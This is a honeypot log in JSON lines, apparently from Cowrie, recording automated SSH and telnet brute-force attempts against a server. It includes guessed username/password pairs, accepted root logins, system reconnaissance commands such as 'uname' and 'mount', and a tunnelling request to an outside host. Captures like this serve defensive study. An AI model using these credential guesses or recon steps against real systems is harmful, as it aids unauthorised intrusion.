{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59480,"dst_ip":"1.2.3.4","dst_port":22,"session":"81bb8b28f3da","protocol":"ssh","message":"New connection: 212.227.125.160:59480 (1.2.3.4:22) [session: 81bb8b28f3da]","sensor":"my-vps","timestamp":"2025-08-31T04:22:46.179410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:22:46.839481Z","src_ip":"212.227.125.160","session":"81bb8b28f3da"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:22:46.840252Z","src_ip":"212.227.125.160","session":"81bb8b28f3da"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"P@ssw0rd123","message":"login attempt [odoo/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:22:48.863725Z","src_ip":"212.227.125.160","session":"81bb8b28f3da"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:22:50.302856Z","src_ip":"212.227.125.160","session":"81bb8b28f3da"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56386,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dd9ba12f58b","protocol":"ssh","message":"New connection: 217.72.205.35:56386 (1.2.3.4:22) [session: 2dd9ba12f58b]","sensor":"my-vps","timestamp":"2025-08-31T04:22:58.448311Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:22:58.449487Z","src_ip":"217.72.205.35","session":"2dd9ba12f58b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59139,"dst_ip":"1.2.3.4","dst_port":22,"session":"b10a31948e4d","protocol":"ssh","message":"New connection: 212.227.235.229:59139 (1.2.3.4:22) [session: b10a31948e4d]","sensor":"my-vps","timestamp":"2025-08-31T04:22:59.571744Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:22:59.572836Z","src_ip":"212.227.235.229","session":"b10a31948e4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59513,"dst_ip":"1.2.3.4","dst_port":22,"session":"0efe96845da4","protocol":"ssh","message":"New connection: 212.227.235.229:59513 (1.2.3.4:22) [session: 0efe96845da4]","sensor":"my-vps","timestamp":"2025-08-31T04:22:59.728605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:22:59.730171Z","src_ip":"212.227.235.229","session":"0efe96845da4"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T04:22:59.887341Z","src_ip":"212.227.235.229","session":"0efe96845da4"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:23:00.365441Z","src_ip":"212.227.235.229","session":"0efe96845da4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T04:23:00.523901Z","session":"0efe96845da4"}
{"eventid":"cowrie.session.closed","duration":"20.4","message":"Connection lost after 20.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:23:01.621893Z","src_ip":"212.227.235.229","session":"558acac073b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46796,"dst_ip":"1.2.3.4","dst_port":23,"session":"68bf54656370","protocol":"telnet","message":"New connection: 212.227.125.160:46796 (1.2.3.4:23) [session: 68bf54656370]","sensor":"my-vps","timestamp":"2025-08-31T04:23:05.639177Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48284,"dst_ip":"1.2.3.4","dst_port":22,"session":"c527f636ad0c","protocol":"ssh","message":"New connection: 212.227.235.229:48284 (1.2.3.4:22) [session: c527f636ad0c]","sensor":"my-vps","timestamp":"2025-08-31T04:23:24.015890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:23:24.735825Z","src_ip":"212.227.235.229","session":"c527f636ad0c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:23:24.736492Z","src_ip":"212.227.235.229","session":"c527f636ad0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45468,"dst_ip":"1.2.3.4","dst_port":22,"session":"f194fc7c199f","protocol":"ssh","message":"New connection: 212.227.125.160:45468 (1.2.3.4:22) [session: f194fc7c199f]","sensor":"my-vps","timestamp":"2025-08-31T04:23:26.786742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:23:28.421144Z","src_ip":"212.227.125.160","session":"f194fc7c199f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:23:28.421813Z","src_ip":"212.227.125.160","session":"f194fc7c199f"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"letmein","message":"login attempt [odoo/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T04:23:30.661673Z","src_ip":"212.227.235.229","session":"c527f636ad0c"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:23:32.543029Z","src_ip":"212.227.235.229","session":"c527f636ad0c"}
{"eventid":"cowrie.login.success","username":"root","password":"Equipe","message":"login attempt [root/Equipe] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:23:33.923611Z","src_ip":"212.227.125.160","session":"f194fc7c199f"}
{"eventid":"cowrie.session.closed","duration":31.339436769485474,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:23:36.978544Z","src_ip":"212.227.125.160","session":"68bf54656370"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:23:37.598727Z","src_ip":"212.227.125.160","session":"f194fc7c199f"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T04:23:37.599629Z","src_ip":"212.227.125.160","session":"f194fc7c199f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:23:38.901534Z","src_ip":"212.227.125.160","session":"f194fc7c199f"}
{"eventid":"cowrie.session.closed","duration":"12.1","message":"Connection lost after 12.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:23:38.902795Z","src_ip":"212.227.125.160","session":"f194fc7c199f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49506,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f9a75051249","protocol":"ssh","message":"New connection: 212.227.125.160:49506 (1.2.3.4:22) [session: 9f9a75051249]","sensor":"my-vps","timestamp":"2025-08-31T04:23:39.639278Z"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts","message":"login attempt [ts/ts] failed","sensor":"my-vps","timestamp":"2025-08-31T04:23:42.148296Z","src_ip":"212.227.125.160","session":"dfcafe64c1d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38386,"dst_ip":"1.2.3.4","dst_port":22,"session":"e11b39128b71","protocol":"ssh","message":"New connection: 212.227.125.160:38386 (1.2.3.4:22) [session: e11b39128b71]","sensor":"my-vps","timestamp":"2025-08-31T04:23:45.341197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:23:45.777634Z","src_ip":"212.227.125.160","session":"e11b39128b71"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:23:45.779039Z","src_ip":"212.227.125.160","session":"e11b39128b71"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":59456,"dst_ip":"1.2.3.4","dst_port":22,"session":"323104ca441a","protocol":"ssh","message":"New connection: 201.148.180.50:59456 (1.2.3.4:22) [session: 323104ca441a]","sensor":"my-vps","timestamp":"2025-08-31T04:23:46.585476Z"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"letmein","message":"login attempt [odoo/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T04:23:47.882874Z","src_ip":"212.227.125.160","session":"e11b39128b71"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:23:48.439604Z","src_ip":"201.148.180.50","session":"323104ca441a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:23:49.152995Z","src_ip":"212.227.125.160","session":"9f9a75051249"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:23:49.153902Z","src_ip":"212.227.125.160","session":"9f9a75051249"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:23:49.401324Z","src_ip":"212.227.125.160","session":"e11b39128b71"}
{"eventid":"cowrie.session.closed","duration":"89.8","message":"Connection lost after 89.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:23:50.882605Z","src_ip":"212.227.125.160","session":"dfcafe64c1d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40557,"dst_ip":"1.2.3.4","dst_port":23,"session":"124f800e9c1f","protocol":"telnet","message":"New connection: 212.227.235.229:40557 (1.2.3.4:23) [session: 124f800e9c1f]","sensor":"my-vps","timestamp":"2025-08-31T04:23:52.499572Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39604,"dst_ip":"1.2.3.4","dst_port":22,"session":"7382e07a9e8d","protocol":"ssh","message":"New connection: 212.227.235.229:39604 (1.2.3.4:22) [session: 7382e07a9e8d]","sensor":"my-vps","timestamp":"2025-08-31T04:24:00.523953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:24:00.524800Z","src_ip":"212.227.235.229","session":"7382e07a9e8d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T04:24:00.621867Z","src_ip":"212.227.235.229","session":"7382e07a9e8d"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"q1w2e3r4","message":"login attempt [oracle/q1w2e3r4] failed","sensor":"my-vps","timestamp":"2025-08-31T04:24:00.914962Z","src_ip":"212.227.235.229","session":"7382e07a9e8d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:24:02.014750Z","src_ip":"212.227.235.229","session":"7382e07a9e8d"}
{"eventid":"cowrie.session.closed","duration":13.709041833877563,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:24:06.208547Z","src_ip":"212.227.235.229","session":"124f800e9c1f"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:24:09.728783Z","src_ip":"212.227.235.229","session":"0efe96845da4"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:24:14.794215Z","src_ip":"212.227.125.160","session":"9f9a75051249"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51202,"dst_ip":"1.2.3.4","dst_port":22,"session":"695f44d4227e","protocol":"ssh","message":"New connection: 212.227.235.229:51202 (1.2.3.4:22) [session: 695f44d4227e]","sensor":"my-vps","timestamp":"2025-08-31T04:24:20.759911Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:24:21.845237Z","src_ip":"212.227.125.160","session":"9f9a75051249"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:24:21.846021Z","src_ip":"212.227.125.160","session":"9f9a75051249"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55944,"dst_ip":"1.2.3.4","dst_port":22,"session":"9924277342dd","protocol":"ssh","message":"New connection: 212.227.235.229:55944 (1.2.3.4:22) [session: 9924277342dd]","sensor":"my-vps","timestamp":"2025-08-31T04:24:23.559431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:24:24.049379Z","src_ip":"212.227.235.229","session":"695f44d4227e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:24:24.052326Z","src_ip":"212.227.235.229","session":"695f44d4227e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:24:24.344389Z","src_ip":"212.227.235.229","session":"9924277342dd"}
